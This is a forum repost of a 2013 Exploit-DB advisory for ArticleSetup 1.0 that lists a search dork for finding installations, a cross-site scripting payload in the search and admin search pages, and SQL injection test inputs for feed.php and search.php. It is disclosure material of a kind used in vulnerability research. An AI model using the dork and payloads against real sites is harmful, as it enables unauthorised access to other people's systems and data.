- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 28564
- Проверка EDB
-
- Пройдено
- Автор
- DEVILSCREAM
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2013-09-26
Код:
#Exploit Title : ArticleSetup Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 21/09/2013
#Category : Web Applications
#Vendor : http://www.articlesetup.com/
#Version : 1.0
#Dork
intext:Powered By Article Marketing
#Vulnerability : Cross Site Scripting , SQL Injection
#Tested On : Windows 7, Ubuntu (Mozila & Chrome)
#Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker
Cross Site Scripting
http://site-target/search.php?s=[XSS]
#XSS at Page Admin
http://site-target/admin/search.php?s=<script>alert('DevilScreaM')</script>
===================================================================================
SQL Injection Vulnerability
http://site-target/feed.php?cat=[SQL Injection]
http://site-target/search.php?s=[SQL Injection]
Example
http://site-target/feed.php?cat=100'
http://site-target/search.php?s=123'
====================================================================================
- Источник
- www.exploit-db.com